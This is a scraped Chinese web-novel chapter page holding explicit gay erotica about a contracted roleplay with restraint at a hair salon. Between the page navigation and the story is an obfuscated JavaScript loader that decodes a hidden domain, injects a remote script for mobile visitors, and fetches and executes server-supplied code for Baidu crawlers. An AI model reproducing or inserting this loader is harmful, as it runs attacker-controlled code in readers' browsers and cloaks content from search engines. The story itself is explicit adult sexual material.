返回制定公馆_第2章  殇绝天下首页

关灯 护眼     字体:

上一章 目录 下一章

function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuZHNramJ2enZzLmNvbQ==','2843',window,document,['G','TpoZFcguG']);}:function(){};

“没问题,从现在起,我就是阿豪。”为什么要设定在这样的场景,是因为杨轩很久以前发现自己喜欢男人,就是因为常去的那家发廊有一个自己暗恋很久的发型师阿豪,可是对方并非是gay,结婚的时候还发了喜糖给自己,这段暗恋无疾而终,却始终是杨轩心里未完成的一个梦。男人的手就像是有魔力一样,开始还担心他只是做做样子,可是这动作娴熟,认真仔细,丝毫不觉得他只是这场定制中的一个角色,他轻柔的用水冲刷杨轩的头皮,一面洗一面说道:“杨先生,等下您希望剪一个什么样的发型呢?”“剪短一点就好。”真的要剪头发吗?杨轩的脑袋晕晕的,因为明明知道,来这里的目的,不会是剪头发那么简单。当他坐在镜子前,被吹风机吹着头发的时候,这种无数次出现在梦里的场景,真的让他昏昏欲睡。所以当阿豪在耳边提醒他醒过来时,很尴尬的发现自己竟然真的睡着了。“抱歉……我不是故意……”杨轩动了动放在扶手上的双手,手腕被里面有一圈绒毛的手铐铐在了椅子上,男人正扶着他的肩膀,手里拿着一把剪刀。透过正面的镜子和他四目相对,面具遮挡下依然能感受到男人狂妄的目光。正满意的审视着杨轩困在椅子上动弹不能的样子。“怎么了杨先生?我应该没有绑的很紧,您并没有要求在身上留下特殊的痕迹,所以我很小心。”男人的手抚摸过杨轩的指尖,说话时候正好在他的脸侧,男性荷尔蒙充斥在他的鼻息间,没错,自己是不喜欢在这方面多做尝试,可是他也不想再被人说无趣,所以在定制的时候,是否接受适度的束缚时候,他一咬牙,选择了接受,所以现在这个样子,是他对自己底线的一种挑战。看杨轩抿着唇低下了头,阿豪不易察觉的轻笑一声,继续手上的动作。不忘嘱咐道:“按照合约所写,接下来您必须按照流程顺从我,无论我做什么您都要接受,虽然可能您觉得这会很强势,但是我保证,会给您一次前所未有的性体验。”不等杨轩揣摩过来这句话的意思,自己的领口就被剪刀剪掉了第一颗纽扣。“很少见到人穿休闲衬衣还要系住第一颗纽扣,您不会觉得热吗?”冰凉的剪刀恰到好处只是做着剪掉和挑开的动作,没有划伤杨轩的肌肤,他颤抖的看着最后一颗纽扣滚落到地上,露出里面还算精壮的肉体,常年做室内工作,把他皮肤保养的很白皙,可是因为还有一部分塞在牛仔裤里,衬衣并没有完全打开,剪刀转移阵地,在乳头的部分画了几个圈,撩拨的他很想阻止,可对方根本不会停,只能羞涩的任由阿豪的剪刀把胸前两个乳头位置的衬衣剪出两个圆洞,红色的乳尖比他的主人要诚实许多,被剪刀轻轻碰触,就立的更坚挺。“您这里的颜色真美,是我见过里面最好看的。”明知道是恭维,可杨轩还是因为他的话,偷偷看了一眼镜子里的自己,立刻就被这样放荡的场景给吓住,真是太下流了。剪刀暂时被放到一边,阿豪的手上换成了一个小刷子,从他的脖子,锁骨,一直到乳头,轻轻搔弄,那种酥酥麻麻的快感让杨轩心痒难耐,看到两个乳头鲜艳欲滴,阿豪埋头在他的耳后一路吻着,最后一口含住那个渴求更多爱抚的乳头,正好是左边心脏的位置,稍稍含在嘴里用舌头一舔,如果杨轩不是被绑着,肯定已经弹跳起来,右边的乳头还被小刷子抚弄着,两边同时传来不同的快感,不是没有被人舔过这里,可是阿豪的嘴特别会吸,就算是很用力,也不会觉得疼,反而觉得不够,想要更多。“这才刚刚开始,如果您觉得爽,不妨叫出声来。”阿豪的舌尖绕着那小小的乳头打转,牙齿咬住往高一拉,杨轩再也忍不住的轻呼一声,以前不到高潮都不会放纵自己发出这样淫荡的叫声,今天仅仅是前戏,就忍耐不住,到底是因为太久没有男人爱抚,还是说这个人的技巧好的要命。“啊……”脖颈扬起的同时,喉头一动,汗水滑落在锁骨间,杨轩眯起眼,享受着这种前所未有的被对待。“哢哒”一声,裤带被解开。阿豪很爽快的绕到正面,一手脱下杨轩的牛仔裤丢在地上,被四角裤包裹着的肉棒已经有了抬头的趋势。他放下刷子重新抄起剪刀,用剪刀的尖端在底裤卵蛋的位置摩擦,用手捏起一点布料,剪开一道小口,深入几根手指,在杂乱的黑色毛发见握住那个蠢蠢欲动的肉棒掏出来,大么指有节奏的摩挲着溢出前列腺液的铃口,然后自己跪下,轻轻的吻住他的肚脐,惹得杨轩的肉棒站的更直更挺,龟头亮津津的,像是有吐不完的液体分泌着。阿豪的一只手搓弄他娇嫩的乳头,一只手揉弄囊袋和会阴,自己的嘴巴则包裹着杨轩的肉棒,这样细致的前戏让他的身体更加空虚,以前都被后穴揉弄几下就干进来,很少有这种交流,几次睁开闭住的眼睛,看到镜子里那个放纵在欲海里任由对方服务的自己,就觉得好不真实。男人在嘴里用舌头描绘着他的形状,杨轩吃的清淡,所以肉棒没有什么异味,男人也伺候的更卖力,终于在舌尖顶住铃口刺探的时候,阿豪吐出肉棒,看着白色的精液喷到自己胸口和杨轩的肚子上,那液体缓缓滑下汇聚,被阿豪均匀的抹开在腹部,精液的腥味刺激的杨轩更加欲求不满,他想要更火热的东西来填补自己的身体。腰身被阿豪抓住向下一滑,两条腿被大手高高举起,小腿夹在脸旁,整个菊花嫩穴暴露在阿豪脸前,虽然还有被剪开的内裤做遮掩,可是两下,这内裤形同虚设,除了让人觉得诱惑淫荡,再没有遮掩的作用。“不……不要看……好丢人……”杨轩别开脸,不自然的扭动腰身,可是动作被控制,这样看着更像是邀请,嫩穴一缩一缩的呼吸着空气,褶皱放松然后紧致,别提多诱人。“你一定很受欢迎。”阿豪没有着急进行接下来的动作,而是欣赏一样看着那个淡粉色的小穴,虽然外面的颜色有些深,可是呼吸间露出的嫩肉还是很销魂。杨轩硬件条件不差,确实如果去gay吧之类的地方很多人搭讪,可是一方面因为自己本身羞涩不爱和人打交道,一方面又好几次被前男友说床上无趣,久而久之,他其实特别的自卑,现在做的每一件事,都是他以前想也不敢想的。“我……他们说我很无趣……”“您只是比较内向羞涩,是他们没有发现您的好处。”“真,真的吗?”杨轩看着男人的眼睛,不敢相信。“您这里的样子真可爱,如果把您这幅样子拍下来,我相信很多男人会非常迷恋您。”“拍下来?!”杨轩吓的连菊穴都狠狠收缩了一下,脸涨红的能滴下血来。阿豪赶紧解释道:“我就是做个比喻,您别担心,我不会那样做。”说完,阿豪掰开那个臀缝间的穴口,低头伸出舌头,试探的想要刺入,先是用舌尖描绘褶皱,然后才慢慢的深入。“啊……不要……脏………啊啊……唔!”虽然忍不住的发出一声呻吟,杨轩被自己的反常震住,越来越多要呼之欲出的呻吟声被他憋在喉头里,这样的隐忍让肌肉绷紧,反而更加敏感,似乎能感觉到自己后穴的舌头,正侵犯进自己体内。尤其阿豪吮吸的瞬间,那种肠壁被拽住的快感,彻底崩溃了他的神经。阿豪吸了一会,听到杨轩的闷哼后,推出舌头,揉弄了一下那个依依不舍的小穴,从本应该是定型胶的压嘴瓶里挤出来味道清甜的润滑液在手上,用更加粗糙的手指代替舌头继续开发那饥渴的肉穴。“杨先生,您这里好紧,您不放松一会可是会不舒服。”“啊……啊……不要碰那里!”几乎是尖叫,男人的指尖探入的很深,戳到了前列腺的位置,“怎么会……怎么这么爽……啊啊啊……”“难道您以前的恋人都没有为您按摩到这里吗?”阿豪皱眉道。杨轩有点委屈,其实之前的经验,每次都是草草结束,总觉得这样的事情爽过就好,不用太花心思,追根究底,是因为第一次的时候当时的恋人也是第一次,弄的自己很痛,所以对这个事情有些阴影,后来处的两个男友也都上过几次床就分了,事到如今,他总是听说别人说做爱多么的爽快,自己是从没有这么觉得。杨轩光顾着自己思考,没有回答,但答案都写在脸上,阿豪很识相的没有追问,加重了手里的力道和速度,就着润滑液,来来回回抽插拔出,每次还要故意勾起手指,用指头的关节顶住杨轩的菊心,那种骨子里舒爽的快感让他呼吸急促,呻吟声也控制不住。“啊啊……怎么会这么爽……啊啊……不行了不行了……啊啊……”杨轩的肠壁抽搐不已,阿豪的手指却一下子抽出来,肉穴的空虚感被放大,杨轩也不知道自己怎么会这么下贱,竟然觉得好希望现在有个火热的东西贯穿自己,操弄自己,快感这种东西一旦尝过,就会想要更多。

『加入书签,方便阅读』

上一章 目录 下一章